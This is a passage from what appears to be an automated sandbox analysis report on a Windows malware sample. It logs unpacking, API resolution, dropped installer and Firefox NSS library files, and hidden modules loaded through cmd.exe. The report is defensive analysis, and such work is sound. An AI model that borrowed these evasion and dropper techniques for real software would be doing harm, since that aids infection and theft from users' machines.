                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: y:C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303653067.0000013E35A20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: Qg_Appv5.exe, 00000004.00000002.2307968581.0000000006BD2000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2245242883.000000006C267000.00000002.00000001.01000000.0000000F.sdmp, UniversalInstaller.exe, 00000006.00000002.2309485282.000000006C267000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\xinosa dulicados52\vogewaxupi\gixugajipak20\n.pdb source: 4BfhCycV4B.exe, 00000000.00000003.2057767194.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000000.2055726673.000000000040F000.00000002.00000001.01000000.00000005.sdmp
                            Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3480582063.0000013E506C0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: 0C:\yokirew38_tidamikip hopoyura.pdb source: 4BfhCycV4B.exe, 00000000.00000000.2014790341.000000000040F000.00000002.00000001.01000000.00000003.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2264464647.0000000004330000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeUnpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeUnpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                            Detected unpacking (overwrites its own PE header)
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeUnpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeUnpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00416240
                            Source: fak.7.drStatic PE information: real checksum: 0x0 should be: 0xc94c3
                            Source: relay.dll.5.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: relay.dll.4.drStatic PE information: real checksum: 0x18dd31 should be: 0x191202
                            Source: 4BfhCycV4B.exeStatic PE information: real checksum: 0x79e57 should be: 0x79e60
                            Source: Qg_Appv5.exe.0.drStatic PE information: section name: .didata
                            Source: u3z0.1.exe.0.drStatic PE information: section name: .didata
                            Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                            Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                            Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                            Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                            Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                            Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                            Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0042D355 push esi; ret 0_2_0042D35E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004275A4 push eax; ret 0_2_004275C2
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04221CA2 push dword ptr [esp+ecx-75h]; iretd 0_2_04221CA6
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421C52F push esp; retf 0_2_0421C537
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209F6D push ecx; ret 0_2_04209F80
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0422780B push eax; ret 0_2_04227829
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209A1D push ecx; ret 0_2_04209A30
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0421CB2D push esp; retf 0_2_0421CB2E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F0C28 push ecx; iretd 0_2_042F0C3A
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F244D pushad ; retf 0_2_042F2454
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F2137 push 2B991403h; ret 0_2_042F213E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042F2A5C push 00000061h; retf 0_2_042F2A64
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EFB9E pushad ; retf 0_2_042EFB9F
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004176C5 push ecx; ret 2_2_004176D8
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B536 push ecx; ret 2_2_6C77B549
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A45 push edx; ret 4_2_00412A94
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0041264E push ebx; ret 4_2_0041266C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E53 push ecx; ret 4_2_00412E54
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E55 push es; iretd 4_2_00412E62
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412C5B push edx; ret 4_2_00412C5C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E63 push ebx; ret 4_2_00412E6C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0041266D push es; ret 4_2_0041267A
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E6D push edx; ret 4_2_00412E78
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412E7E push edx; ret 4_2_00412E80
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A01 push edx; ret 4_2_00412A14
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412609 push edi; ret 4_2_00412614
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412C09 push ebx; ret 4_2_00412C1C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412615 push edx; ret 4_2_0041262C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_00412A1A push edx; ret 4_2_00412A1C
                            Source: fak.7.drStatic PE information: section name: .text entropy: 6.816878789485625
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.1.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ypbquxnwoJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\fakJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile created: C:\Users\user\AppData\Local\Temp\u3z0.0.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeFile created: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\fakJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ypbquxnwoJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo ApplicationsJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Found hidden mapped module (file has been removed from disk)
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FAK
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YPBQUXNWO
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
